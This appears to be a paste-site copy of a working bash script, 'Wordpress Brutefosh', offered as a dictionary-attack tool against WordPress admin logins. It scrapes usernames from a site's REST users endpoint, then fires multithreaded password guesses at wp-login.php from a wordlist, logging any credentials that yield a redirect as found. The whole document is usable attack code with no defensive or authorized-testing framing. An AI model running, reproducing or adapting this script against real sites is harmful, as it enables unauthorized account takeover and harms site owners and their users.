SHOW:
|
|
- or go back to the newest paste.
1 | #!/bin/bash | |
2 | # Name : Wordpress Brutefosh | |
3 | # Version : 1.2 | |
4 | # Desc. : Dictionary Attack Tool - Wordpress Admin | |
5 | # Coded by : Schopath | |
6 | # Website : www.zerobyte.id | |
7 | # Updated on : 2019-03-28 | |
8 | ||
9 | #----------- CONFIGURATION ----------- | |
10 | curl_timeout=20 | |
11 | multithread_limit=10 | |
12 | #--------- CONFIGURATION EOF --------- | |
13 | ||
14 | if [[ -f wpusername.tmp ]] | |
15 | then | |
16 | rm wpusername.tmp | |
17 | fi | |
18 | RED='\e[31m' | |
19 | GRN='\e[32m' | |
20 | YEL='\e[33m' | |
21 | CLR='\e[0m' | |
22 | ||
23 | function _GetUserWPJSON() { | |
24 | Target="${1}"; | |
25 | UsernameLists=$(curl --connect-timeout ${curl_timeout} --max-time ${curl_timeout} -s "${Target}/wp-json/wp/v2/users" | grep -Po '"slug":"\K.*?(?=")'); | |
26 | echo "" | |
27 | if [[ -z ${UsernameLists} ]]; | |
28 | then | |
29 | echo -e "${YEL}INFO: Cannot detect Username!${CLR}" | |
30 | else | |
31 | echo -ne > wpusername.tmp | |
32 | for Username in ${UsernameLists}; | |
33 | do | |
34 | echo "INFO: Found username \"${Username}\"..." | |
35 | echo "${Username}" >> wpusername.tmp | |
36 | done | |
37 | fi | |
38 | } | |
39 | ||
40 | function _TestLogin() { | |
41 | Target="${1}" | |
42 | Username="${2}" | |
43 | Password="${3}" | |
44 | LetsTry=$(curl --connect-timeout ${curl_timeout} --max-time ${curl_timeout} -s -w "\nHTTP_STATUS_CODE_X %{http_code}\n" "${Target}/wp-login.php" --data "log=${Username}&pwd=${Password}&wp-submit=Log+In" --compressed) | |
45 | if [[ ! -z $(echo ${LetsTry} | grep login_error | grep div) ]]; | |
46 | then | |
47 | echo -e "${YEL}INFO: Invalid ${Target} ${Username}:${Password}${CLR}" | |
48 | elif [[ $(echo ${LetsTry} | grep "HTTP_STATUS_CODE_X" | awk '{print $2}') == "302" ]]; | |
49 | then | |
50 | echo -e "${GRN}[!] FOUND ${Target} \e[30;48;5;82m ${Username}:${Password} ${CLR}" | |
51 | echo "${Target} [${Username}:${Password}]" >> wpbf-results.txt | |
52 | else | |
53 | echo -e "${YEL}INFO: Invalid ${Target} ${Username}:${Password}${CLR}" | |
54 | fi | |
55 | } | |
56 | ||
57 | echo ' _ _ _ ' | |
58 | echo '| | | | ___ _ __ __| |_ __ _ __ ___ ___ ___ ' | |
59 | echo '| |/\| |/ _ \| `__/ _` | `_ \| `__/ _ \/ __/ __|' | |
60 | echo '\ /\ / (_) | | | (_| | |_) | | | __/\__ \__ \' | |
61 | echo ' \/ \/ \___/|_| \__,_| .__/|_| \___||___/___/' | |
62 | echo ' |_|.::Brutefo(sh) 2019::.' | |
63 | echo '' | |
64 | ||
65 | echo -ne "[?] Input website target : " | |
66 | read Target | |
67 | ||
68 | curl --connect-timeout ${curl_timeout} --max-time ${curl_timeout} -s "${Target}/wp-login.php" > wplogin.tmp | |
69 | if [[ -z $(cat wplogin.tmp | grep "wp-submit") ]]; | |
70 | then | |
71 | echo -e "${RED}ERROR: Invalid wordpress wp-login!${CLR}" | |
72 | exit | |
73 | fi | |
74 | ||
75 | echo -ne "[?] Input password lists in (file) : " | |
76 | read PasswordLists | |
77 | ||
78 | if [[ ! -f ${PasswordLists} ]] | |
79 | then | |
80 | echo -e "${RED}ERROR: Wordlists not found!${CLR}" | |
81 | exit | |
82 | fi | |
83 | ||
84 | _GetUserWPJSON ${Target} | |
85 | ||
86 | if [[ -f wpusername.tmp ]] | |
87 | then | |
88 | for User in $(cat wpusername.tmp) | |
89 | do | |
90 | ( | |
91 | for Pass in $(cat ${PasswordLists}) | |
92 | do | |
93 | ((cthread=cthread%multithread_limit)); ((cthread++==0)) && wait | |
94 | _TestLogin ${Target} ${User} ${Pass} & | |
95 | done | |
96 | wait | |
97 | ) | |
98 | done | |
99 | else | |
100 | echo -e "${YEL}INFO: Cannot find username${CLR}" | |
101 | echo -ne "[?] Input username manually : " | |
102 | read User | |
103 | ||
104 | if [[ -z ${PasswordLists} ]] | |
105 | then | |
106 | echo -e "${RED}ERROR: Username cannot be empty!${CLR}" | |
107 | exit | |
108 | fi | |
109 | echo '' | |
110 | ( | |
111 | for Pass in $(cat ${PasswordLists}) | |
112 | do | |
113 | ((cthread=cthread%multithread_limit)); ((cthread++==0)) && wait | |
114 | _TestLogin ${Target} ${User} ${Pass} & | |
115 | done | |
116 | wait | |
117 | ) | |
118 | fi | |
119 | echo "INFO: Found $(cat wpbf-results.txt | grep ${Target} | sort -nr | uniq | wc -l) username & password in ./wpbf-results.txt" |